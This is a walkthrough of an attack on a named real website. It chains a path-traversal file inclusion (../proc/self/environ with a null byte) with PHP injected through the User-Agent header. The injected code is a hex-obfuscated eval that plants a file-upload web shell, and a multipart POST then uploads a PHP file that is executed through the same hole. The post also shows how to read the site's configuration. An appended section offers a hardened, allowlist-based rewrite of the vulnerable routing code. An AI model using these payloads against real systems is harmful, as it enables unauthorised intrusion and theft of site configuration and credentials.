Let me walk you through this scenario as follows
http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ%00
Here the environ file can be injected through the User-Agent.
But the system-call functions exec, system, passthru, shell_exec, escapeshellarg, escapeshellcmd, proc_close, proc_open, dl, popen, show_source are disabled, so wget can't be used to pull down a remote shell.
So I tried to find a way to send a POST of the following form.
URL
http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ%00&do=load
But sadly, when it is uploaded it fails with error 500.
HTTP Headers
Host: duoihinhbatchu.vn
User-Agent: <?eval("\x20\x69\x66\x20\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x64\x6f\x27\x5d\x3d\x3d\x27\x6c\x6f\x61\x64\x27\x29\x7b\xd\xa\x20\x24\x66\x69\x6c\x65\x73\x20\x3d\x20\x40\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x66\x69\x6c\x65\x73\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x20\x21\x3d\x20\x27\x27\x29\x7b\xd\xa\x20\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x20\x3d\x20\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x70\x61\x74\x68\x22\x5d\x2e\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x66\x69\x6c\x65\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27\x5d\x2c\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x29\x29\x20\x65\x63\x68\x6f\x20\x22\x3c\x68\x31\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x27\x3e\x4f\x4b\x2d\x43\x6c\x69\x63\x6b\x20\x68\x65\x72\x65\x21\x3c\x2f\x61\x3e\x3c\x2f\x68\x31\x3e\x22\x3b\xd\xa\x20\x7d\xd\xa\x20\x64\x69\x65\x28\x27\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x50\x4f\x53\x54\x20\x65\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65\x3d\x70\x61\x74\x68\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x73\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\x22\x55\x70\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x27\x29\x3b\xd\xa\x20\x7d\xd\xa");?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ&do=load
Content-Type: multipart/form-data; boundary=---------------------------3727316425797547791100469184
Content-Length: 78754
POST Data
-----------------------------3727316425797547791100469184\r\n
Content-Disposition: form-data; name="path"\r\n
\r\n
\r\n
-----------------------------3727316425797547791100469184\r\n
Content-Disposition: form-data; name="files"; filename="xgr.php"\r\n
Content-Type: application/x-httpd-php\r\n
\r\n
<? phpinfo(); ?>\r\n
-----------------------------3727316425797547791100469184--\r\n
http://duoihinhbatchu.vn/webadmin.php
http://duoihinhbatchu.vn/xgr.php
Run
http://duoihinhbatchu.vn/index.php?act=../xgr.php%00
http://duoihinhbatchu.vn/index.php?act=../webadmin.php%00
Here is how to read the config file:
send a GET request like this

then view the source
<?php
define('_VALID_NVB','1');
define('_VALID_NVB','1');
include("initcms.php");
if($CONFIG['active_site']==0){
header("Location: index4.php?act=error");
}
elseif($CONFIG['active_site']==1){
$act=$_GET['act'];
if($act=='' || $act==null || $act=='home') $act='home';
// $act comes straight from the query string and is never validated before
// being turned into a path and included
$act="modules/$act.php";
include("modules/header.php");
include($act);
include("modules/footer.php");
}
include("endcms.php");
?>
Keep reading initcms.php; conf.php is the configuration file of this website.
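A hardened version of the routing code above, as an added example that is not part of the original post or of the site's own code: the module name is matched against a fixed allowlist and the resolved path is checked to stay inside modules/, so user input never drives include() directly. The allowlist contents and the file layout are assumptions.

```php
<?php
// Added example (not the site's code): allowlist-based module routing.
// The original index.php builds "modules/$act.php" from $_GET['act'] and
// includes it unvalidated, so "../" sequences plus a trailing null byte let a
// request select any readable file on the server (e.g. /proc/self/environ).

define('_VALID_NVB', '1');
include 'initcms.php';

// Only these module names may ever be included (hypothetical list).
// Anything else is rejected before the value gets near a filesystem path.
const ALLOWED_MODULES = ['home', 'load', 'news', 'contact'];

function resolve_module(?string $act): string
{
    // Empty, missing or "home" all map to the default page, as in the original.
    if ($act === null || $act === '' || $act === 'home') {
        return 'home';
    }
    // Exact, type-strict match against the allowlist; no normalisation tricks.
    if (!in_array($act, ALLOWED_MODULES, true)) {
        return 'home';  // or render a 404; never fall through to include()
    }
    return $act;
}

function module_path(string $module): string
{
    $base = realpath(__DIR__ . '/modules');
    $path = realpath($base . '/' . $module . '.php');
    // Belt and braces: even an allowlisted name must resolve inside modules/.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('module path escaped modules/');
    }
    return $path;
}

if ($CONFIG['active_site'] == 0) {
    header('Location: index4.php?act=error');
    exit;
}

$module = resolve_module($_GET['act'] ?? null);
include 'modules/header.php';
include module_path($module);
include 'modules/footer.php';
include 'endcms.php';
```

Note that disable_functions, which the post shows was already in place, did not stop the attack: include() executes whatever file it reaches, so the fix has to be at the include itself rather than in the list of disabled functions.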